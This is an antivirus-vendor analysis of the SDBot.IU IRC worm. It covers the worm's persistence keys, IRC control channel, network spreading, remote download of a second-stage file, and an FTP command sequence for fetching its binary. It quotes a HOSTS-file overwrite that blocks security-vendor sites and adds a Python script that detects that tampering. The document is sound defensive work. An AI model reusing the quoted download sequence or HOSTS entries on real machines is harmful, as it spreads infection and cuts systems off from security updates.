Virus

W32/SDBot.IU!worm

Analysis


Specifics
This virus is 32-bit with a packed file size of 68,611 bytes. This virus contains instructions to copy itself to other systems across a LAN/WAN and to respond to instructions received from a malicious user after first connecting to an IRC server and channel. When the virus copies itself to other systems, the file is saved in the System32 folder as "cool.exe". The file is then executed remotely and copies itself as "syslog32.exe" in the same folder.

This virus may terminate security applications which match a hard-coded list. This virus may also function as a small FTP server.


Loading At Windows Startup
If the virus is run, it will copy itself to the local system into the drivers folder as "ntsyst32.exe" and set a registry entry to load the virus as a service at each Windows startup -

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Microsoft System Checkup" = wnetlogin.exe
"NT Logging Serivce" = syslog32.exe


IRC Connection
The virus attempts to connect to a common IRC server named "irc.undernet.org" on destination TCP port 6667. The connection is used mainly for communication messages; however, a malicious user can use the open connection to send instructions to the virus.


Network Shares Infection Method
The virus may attempt to locate other machines on the network and penetrate them by using a dictionary attack to log on to the target system, an RPC DCOM exploit, or an LSASS exploit.

If a system is vulnerable, the virus attempts to copy itself to the target into these shares and hard-coded locations -

C:\Documents and Settings\All Users\Start Menu\Programs\Startup
C:\WINDOWS\Start Menu\Programs\Startup
C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINDOWS\Start Menu\Programs\Startup
C$\Documents and Settings\All Users\Start Menu\Programs\Startup
C$


File Retrieval
This virus may attempt to download files from hard-coded websites. For instance, instructions in the virus attempt to connect to 'maniacu2.homeftp.net', retrieve the file "cool2.exe" and then execute it. At the time of this writing, the file and server were not accessible.

When the virus begins targeting other systems, it may attempt to retrieve the downloaded file as "cool" using the following FTP instruction set -

open <infected host> 10051
h
h
get cool.exe
cool.exe


HOSTS File Overwrite
The virus attempts to block the system and user from accessing certain antivirus websites by overwriting the HOSTS file with invalid resolution entries, as in this example -

127.0.0.1 www.trendmicro.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com

The purpose of doing this is to prevent the infected host from updating its Antivirus software.
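The following is an added detection example, not part of the original analysis: it parses a Windows HOSTS file and flags any entry that pins a security-vendor domain to a loopback or null address, which is the overwrite described above. The vendor list is taken from the entries quoted in this analysis; the sample HOSTS contents are constructed for the example.

```python
import ipaddress
import re

# Added example, not from the advisory. Vendor list taken from the HOSTS
# entries quoted above; the sample HOSTS contents below are constructed.
VENDOR_DOMAINS = {
    "trendmicro.com", "mcafee.com", "symantec.com", "nai.com", "my-etrust.com",
    "ca.com", "networkassociates.com", "avp.com", "kaspersky.com",
    "f-secure.com", "viruslist.com", "symantecliveupdate.com", "sophos.com",
}
# Resolution targets that make a name unreachable.
SINKHOLE_IPS = {"127.0.0.1", "0.0.0.0", "::1"}


def is_vendor_host(hostname: str) -> bool:
    """True if hostname equals, or is a subdomain of, a vendor domain."""
    host = hostname.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in VENDOR_DOMAINS)


def find_hosts_hijacks(hosts_text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, ip, hostname) for each vendor name pinned to a sinkhole.
    Strips '#' comments, skips blank/malformed lines, allows several names per line."""
    hits = []
    for line_no, raw in enumerate(hosts_text.splitlines(), start=1):
        parts = re.split(r"\s+", raw.split("#", 1)[0].strip())
        if len(parts) < 2:
            continue
        ip, names = parts[0], parts[1:]
        try:
            ipaddress.ip_address(ip)
        except ValueError:
            continue
        if ip in SINKHOLE_IPS:
            hits.extend((line_no, ip, n) for n in names if is_vendor_host(n))
    return hits


# Constructed sample: a legitimate localhost line plus hijacked entries.
SAMPLE_HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1 liveupdate.symantec.com
127.0.0.1 www.mcafee.com mcafee.com   # two names on one line
0.0.0.0 update.symantec.com
10.0.0.5 intranet.example
"""

if __name__ == "__main__":
    for line_no, ip, name in find_hosts_hijacks(SAMPLE_HOSTS):
        print(f"line {line_no}: {name} -> {ip}")
```

On a live system, read %SystemRoot%\System32\drivers\etc\hosts and pass its contents to find_hosts_hijacks; any hit on a vendor update domain is a strong indicator of this kind of tampering.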


Miscellaneous
The virus contains these strings in its unpacked form -

---begin--- AV Guy READ: where do u come up with names like Donk.B? Put a reprezentative name like windr0ne ----end----

Windrone 8.1 final by Romanian 1337 hackers


Recommended Action

  • Check the main screen using the web interface for your FortiGate unit to ensure that the latest AV/NIDS database has been downloaded and installed on your system - if required, enable the "Allow Push Update" option
  • Using the FortiGate manager, block internal to external and external to internal access using TCP ports 6667 and 10051 - it may require defining ports as a service prior to blocking